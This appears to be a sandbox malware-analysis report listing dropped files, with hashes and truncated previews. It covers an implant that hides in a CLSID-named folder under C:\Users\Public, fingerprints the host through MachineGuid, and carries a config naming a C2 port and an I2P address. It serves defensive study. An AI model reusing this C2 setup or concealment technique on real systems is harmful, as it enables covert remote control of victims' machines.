SHA1:	A86261D43F6757A0388FF833A368A3A69AFB6E37
SHA-256:	506D1BC3DB2E706F8E15939E085A9EADF606B3C417476407B18E166C520ECC1D
SHA-512:	AD46F9AC7EDC95C67EE195AA03C7DD93A36A8C9507D3D084A37A1344811691E5218D6935C124936ADEEEBA57B9C9ED611044427375F4E2770F0C995A908B914C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9EE.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4603
Entropy (8bit):	4.411656164499835
Encrypted:	false
SSDEEP:	48:cvIwWl8zs9rJg771I9RWWpW8VYgYm8M4JD2+AFXyq85/3Tg4p3Yibd:uIjf9FI7G37VkJAKgY3Yibd
MD5:	1B94EBB13739A9F843AE325FEDB2CD71
SHA1:	125384DE1FBF469A4C5C68BB5E47841A4ACC46D1
SHA-256:	C4A43D83266D3FD583AD1C5BE7E31E2C3C55E0E9449FC0A2000B029077B6545C
SHA-512:	1DA53E07D1364E510D1EB9CA7DA5392E0504B7B4F012F34A85A067BCF3301E03618BCBB1C0DD59E6B57005F09FCBF28C542CA78E059402DD8B200645E7CB8868
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="538917" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9FC.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	78902
Entropy (8bit):	3.0940774677149414
Encrypted:	false
SSDEEP:	1536:J4K5VtjFIZ0cM7x4rlSVgZwb0s0QnaLI+wM:J4K5VtjFIZ0cM7x4rlSVgZwb0s0QnQIW
MD5:	CE8315AA6AA5C5687472EA302DB22AF6
SHA1:	17F53B5DACA9E46454AD3B3AE23B131850BDFFE4
SHA-256:	AFDFE71EC441C20D333DCC634713A1C3823B6A6921A22000AA12121D9D14AF93
SHA-512:	3A3181617E45FF900B4AB1195443BA0426B55204DF5F444C9C48849FD69877CC8970B3AB2D48BC2D0A02070673A70A47C2E532384A91B33080467BF5B473DFB4
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA3B.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6866623956122084
Encrypted:	false
SSDEEP:	96:TiZYW9i0HG8nYpYiVW6HAUYEZ7dtNiUIXHNwvkzDFa964MqwKIHw3:2ZDVOJdWFa964Mqw9Hw3
MD5:	4233619CA1CE1C809D6AF5D42223F8F6
SHA1:	C6B19111FFCA68AD086359C14966BC8C8CA6872F
SHA-256:	557F1C8F6F3D9093716C86786A7DA45AAA670DC8DDA7C33450C9660E83E91A83
SHA-512:	D850EDD9119F48C8E422DA2AEE75B15CC1EE20995DEE869526BC0B9137FFB4A597C29B02F31477681634B4576190ED674BB403B5B07DC4DF325AE93891AA57EC
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl

Download File

Process:	C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe
File Type:	data
Category:	dropped
Size (bytes):	456
Entropy (8bit):	3.2341395630162877
Encrypted:	false
SSDEEP:	12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
MD5:	40AB00517F4227F2C3C334F1D16B65B4
SHA1:	F8D57AF017E2209B4FB24122647FD7F71B67C87C
SHA-256:	4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
SHA-512:	75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
Malicious:	false
Preview:	C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115200
Entropy (8bit):	6.220212606349767
Encrypted:	false
SSDEEP:	1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
MD5:	BE6174AE2B452DA9D00F9C7C4D8A675B
SHA1:	0ABD2C76C82416AE9C30124C43802E2E49C8ED28
SHA-256:	A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
SHA-512:	5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3012
Entropy (8bit):	5.5536054899701774
Encrypted:	false
SSDEEP:	48:CFdHW54yclDYcm9FLnvU4bcPPu4bcPPTM94bcPPZ4bcPPA4bcPPL4bcPPcWIe18J:idH9NYJ9Vv3YPpYPTNYP6YPTYPcYPV3a
MD5:	61A42BC544FC81E6511B6B8F991458C2
SHA1:	ED948623EB0777AE8612B70B99E54E53B808DAAE
SHA-256:	C812464D10B3FF2362E37C04FF0DBC7974BC88EA9962BF360407712CB199DDAF
SHA-512:	EF203003D86885D42772B89D52B7DE0531ADB00B31A973D89FD812D65E756CB43617AFC47F8EF2CD6B25357ADF4BD3A8675983DB17BBDB170F6354AB7B57E7AA
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=c

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [cnccli]
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.0997449470012635
Encrypted:	false
SSDEEP:	6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
MD5:	26702FAAB91B6B144715714A96728F39
SHA1:	CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
SHA-256:	83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
SHA-512:	50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
Malicious:	false
Preview:	[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.259370376612282
Encrypted:	false
SSDEEP:	1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
MD5:	7A8E8A0842D8D65713DEE5393E806755
SHA1:	AF6F3A52009FBF62C21A290EFC34A94C151B683E
SHA-256:	51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
SHA-512:	D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............\|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1021
Entropy (8bit):	5.4493116829156865
Encrypted:	false
SSDEEP:	24:CFAGHS+5lGyclY7Gfy6BgT7cRE9FLxJ7J10ERJSXYSae:CFdHS+54yclDYcm9FLnve/P
MD5:	6A6AB43E13FCE620F7B67A2D6A1EA80F
SHA1:	9141481607A0C59B6046B55A658E849E8B7D09A7
SHA-256:	B35C950564E3CCC7F4597B45622D5577317FA02477F4534D8E7D086194BAA3AA
SHA-512:	D7BC58491070BF47ABC2FF7DB02CD2BFCEB86E1B7910C2DFD91D4AC0E416C5659A107E9C916B217C71B471D5A3A7F65D6C4780B749530FEB12AEC87B0E6BE46C
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe1a4fb070)..[I] (tcp_connect) -> Done(sock=0x374,host=7

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.242846530333761
Encrypted:	false
SSDEEP:	1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
MD5:	FDCF93ACD089B505B524DDFA0FF947F9
SHA1:	A2BADA5807BA001758DBCE46DA634332A5CC14C2
SHA-256:	ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
SHA-512:	110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4426
Entropy (8bit):	5.441438388687585
Encrypted:	false
SSDEEP:	48:CFdHs54yclDYcm9FLnvzBMcwaE9uEM5EF9cCEqPEQHdQ2:idHrNYJ9VvzBt5EsEyEQCEOEoQ2
MD5:	578161E59E49171D339579DDFFE2A1C1
SHA1:	18F9FA30F9988189ED2330E95499102210A47A39
SHA-256:	2EAF3A50B35C8B6E707970404C7464F5D445FB6F863DCF3B5EC8F5E26EFD775E
SHA-512:	E4BE4A2E41C10AE5183F35E2691CE2C68DF90E6770333638B9FA0BBD0484494E53CF86B2AC1C63E5D3C91551E97B052CA6677AB22F86792E20A724BBAD0E412E
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8568
Entropy (8bit):	4.958673415285098
Encrypted:	false
SSDEEP:	96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:	27535CEE6740DFC50A78A0322415E67C
SHA1:	E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:	FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:	25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:	false
Preview:	## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	62449
Entropy (8bit):	7.807149241969407
Encrypted:	false
SSDEEP:	1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
MD5:	688FDFAE15F328A84E8F19F8F4193AF2
SHA1:	C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
SHA-256:	8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
SHA-512:	F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
Malicious:	false
Preview:	I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.ZT.v...C..~m.....r.u.._..0._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\n53qvwtup4waekyrakvw2svm247ujbkgfwsr6blnwpantzo5nz2a.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.606542147798873
Encrypted:	false
SSDEEP:	12:mLlNMRB03f+U1ksM4farxGIPpiWmlA+KRNZgR24KUm:mLlNk2vV1ksxUG4YWmlNKnZgR26m
MD5:	9CD180D80699E7CB8578BBA0FA289690
SHA1:	F4C69C0801E0467855904EDEE6AF56248724777E
SHA-256:	CB7F579F8CA15F4A2D20D412F966BAB24604B3D02846CAADB92D5625647B214C
SHA-512:	9D5860D5E1F25B442E7DBCB7FECB3A09FDD97ED811A9C81B02F965DD466537FF809EEA4EEB28E67665D5B0D459698EF4A14DC01F3746DAAE9D907E6762D8398D
Malicious:	false
Preview:	m.Y...2@!`..3..5N.u'6.Q..j.....T.44...L...B......A../.V.a'.....n].........2.$.`x.=.0...\%.n..\@x..DY..H..).)..pJ...L..........3"..8..O.k0......\|9..X..K.]..I..q.>.M.h.71,.b.x.Y..l.H..<......"......b.x=.{.6..;.F.Et.YW.&...E.w.&..!.sH[....^.e......... T..W...u.......U.Z.z.Q...\.d....6..s....4......S...bA...<.... Q.&..x..x..h......~..W.Y.....qo....%..$.3......C.K5.'.0A.7.H...N;.....R...l..B.......h.J.4....*......&8?....../..-.v._.x...%.:..L5[k...#P.M......Z...).=0.h>M.qu.}.x-"..O...K.Zf

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\wz7qkrnzqpr2zyylfckxtaxrsqsblspad7pbqa3ee5qc7klzdqfq.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.604254884953776
Encrypted:	false
SSDEEP:	12:E+qstflmKO28zDVf0bmc/XyEptiwhcPSv793C:E+Ptfl8VzRAmoyEpDhBv7JC
MD5:	9749178C9973D3FD118A662470950C0C
SHA1:	4B5016E3860F19DE99C394F83CA1409EE54666FD
SHA-256:	26029385C0E148D214341548A179EEFF9392D11CC84C27F3027187972C5F809C
SHA-512:	2DD99DB8235B547395141A515F9856C66B9725A3AE50F827641D28DF8CF9648752E03A10F7D3624B95EB68F960A8458D33425AC3B80A4181F98D54FD611537C5
Malicious:	false
